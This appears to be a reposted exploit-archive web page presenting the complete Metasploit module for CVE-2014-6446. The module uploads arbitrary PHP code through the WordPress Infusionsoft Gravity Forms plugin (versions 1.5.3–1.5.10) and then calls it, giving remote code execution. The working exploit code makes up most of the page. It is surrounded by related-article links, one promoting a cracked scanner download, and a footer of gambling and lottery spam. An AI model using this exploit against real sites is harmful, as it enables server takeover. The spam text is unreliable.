盈讯足球比分网|华体足球比分直播|
关注我们
QRcode 邮件联系 QRcode

WordPress InfusionSoft Upload Exploit

 feng  1,936 ℃  0条点评
Full title WordPress InfusionSoft Upload Exploit
Date add 2014-10-09
Category web applications
Platform php
Risk
CVE CVE-2014-6446

Description:
This Metasploit module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution.

EXP:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: <a href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a>
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
??Rank = ExcellentRanking
??include Msf::HTTP::Wordpress
??include Msf::Exploit::FileDropper
??def initialize(info = {})
????super(update_info(info,
??????'Name'?????????? => 'Wordpress InfusionSoft Upload Vulnerability',
??????'Description'??? => %q{
????????This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
????????Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
????????upload and remote code execution.
??????},
??????'Author'???????? =>
????????[
??????????'g0blin',??????????????????? # Vulnerability Discovery
??????????'us3r777 <[email protected]>'? # Metasploit module
????????],
??????'License'??????? => MSF_LICENSE,
??????'References'???? =>
????????[
??????????['CVE', '2014-6446'],
??????????['URL', '<a href="http://research.g0blin.co.uk/cve-2014-6446/">http://research.g0blin.co.uk/cve-2014-6446/</a>'],
????????],
??????'Privileged'???? => false,
??????'Platform'?????? => 'php',
??????'Arch'?????????? => ARCH_PHP,
??????'Targets'??????? => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
??????'DisclosureDate' => 'Sep 25 2014',
??????'DefaultTarget'? => 0)
????)
??end
??def check
????res = send_request_cgi(
??????'uri'??? => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
????)
????if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
??????return Exploit::CheckCode::Detected
????end
????Exploit::CheckCode::Safe
??end
??def exploit
????php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
????res = send_request_cgi({
??????'uri'?????? => normalize_uri(wordpress_url_plugins, 'infusionsoft',
?????????????????????'Infusionsoft', 'utilities', 'code_generator.php'),
??????'method'??? => 'POST',
??????'vars_post' =>
??????{
????????'fileNamePattern' => php_pagename,
????????'fileTemplate'??? => payload.encoded
??????}
????})
????if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
??????print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
??????register_files_for_cleanup(php_pagename)
????else
??????fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
????end
????print_status("#{peer} - Calling payload ...")
????send_request_cgi({
??????'uri'?????? => normalize_uri(wordpress_url_plugins, 'infusionsoft',
?????????????????????'Infusionsoft', 'utilities', php_pagename)
????}, 2)
??end
end
# 427C3B60F50B06D8?? 1337day.com [2014-10-09]?? 3CE1B3F435C7F156 #
本文标签:
苹果mac os x修复bash漏洞推出下载补丁
F5 iControl Remote Root Command Execution Exploit
批量Webshell管理工具QuasiBot之后门代码分析批量Webshell管理工具QuasiBot之后门代码分析安全扫描神器Acunetix Web Vulnerability Scanner 10发布(含破解版下载)安全扫描神器Acunetix Web Vulnerability Scanner 10发布(含破解版下载)如何使用XSSaminer工具在PHP源码?#22411;?#25496;XSS漏洞如何使用XSSaminer工具在PHP源码?#22411;?#25496;XSS漏洞渗透测试工具实战技巧合集渗透测试工具实战技巧合集

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国?#20351;?#20363;, 沙发拿下 . . .


盈讯足球比分网
山东时时开奖记录 赌博押大小技巧 后三组六杀三码稳赚技巧 北京pk10单吊有啥规律 五星定位胆稳赚技巧方法 飞艇计划稳 北京pk赛车官网下载 北京pk10双面盘预测 三肖3码 北京pk10靠谱刷水方案